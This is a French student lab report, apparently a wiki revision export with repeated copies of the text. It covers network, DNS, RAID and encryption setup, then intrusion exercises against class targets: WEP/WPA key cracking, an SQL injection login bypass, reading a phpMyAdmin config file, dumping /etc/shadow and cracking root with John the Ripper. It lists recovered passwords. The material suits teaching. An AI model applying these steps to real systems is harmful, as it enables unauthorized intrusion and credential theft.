<br />
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur "' or 1=1; --"<br />
<br />
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.<br />
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.<br/><br />
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.<br/><br />
<br />
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.<br/><br />
<br />
2. PHPMyAdmin<br />
<br />
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19<br />
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword <br />
<br />
3. Récupération de fichiers avec l'user rex<br />
<br />
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.<br/><br />
Nous avons lancé la commande :<br />
unshadow /etc/passwd /etc/shadow | head -1 > mdp<br />
Nous avons obtenu un fichier avec le mot de passe root haché.<br />
<br />
5. Decryptage du mot de passe root avec John the Ripper<br />
<br />
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : "mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel".<br/><br />
Nous avons créé un dictionnaire de mots de 4 lettres : <br />
crunch 4 4 abcdefghijklmnopqrstuvwxyz > dict<br />
<br />
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : <br />
sed -i 's/\(.*\)/\1\1/'<br />
La dernière étape consistait à lancer JtR :<br />
john -w:dict mdp<br />
Après 5 minutes d'attente, le mot de passe vu cracké.<br/><br />
Avec la commande : <br />
john --show mdp<br />
On obtient le mot de passe : '''fortfort'''.</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57781TP sysres IMA5 2021/2022 G72022-01-10T17:39:24Z<p>Avercaem : /* Intrusion serveur WEB */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
=== WEP ===<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
=== WPA ===<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
=== Intrusion sur un serveur d’application Web ===<br />
<br />
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur "' or 1=1; --"<br />
<br />
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.<br />
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.<br/><br />
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.<br/><br />
<br />
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.<br/><br />
<br />
2. PHPMyAdmin<br />
<br />
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19<br />
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword <br />
<br />
3. Récupération de fichiers avec l'user rex<br />
<br />
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.<br/><br />
Nous avons lancé la commande :<br />
unshadow /etc/passwd /etc/shadow | head -1 > mdp<br />
Nous avons obtenu un fichier avec le mot de passe root haché.<br />
<br />
5. Decryptage du mot de passe root avec John the Ripper<br />
<br />
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : "mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel".<br/><br />
Nous avons créé un dictionnaire de mots de 4 lettres : <br />
crunch 4 4 abcdefghijklmnopqrstuvwxyz > dict<br />
<br />
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : <br />
sed -i 's/\(.*\)/\1\1/'<br />
La dernière étape consistait à lancer JtR :<br />
john -w:dict mdp<br />
Après 5 minutes d'attente, le mot de passe vu cracké.<br/><br />
Avec la commande : <br />
john --show mdp<br />
On obtient le mot de passe : '''fortfort'''.</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57780TP sysres IMA5 2021/2022 G72022-01-10T17:39:12Z<p>Avercaem : /* Intrusion sur un serveur d’application Web */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
=== WEP ===<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
=== WPA ===<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
=== Intrusion serveur WEB ===<br />
<br />
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur "' or 1=1; --"<br />
<br />
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.<br />
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.<br/><br />
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.<br/><br />
<br />
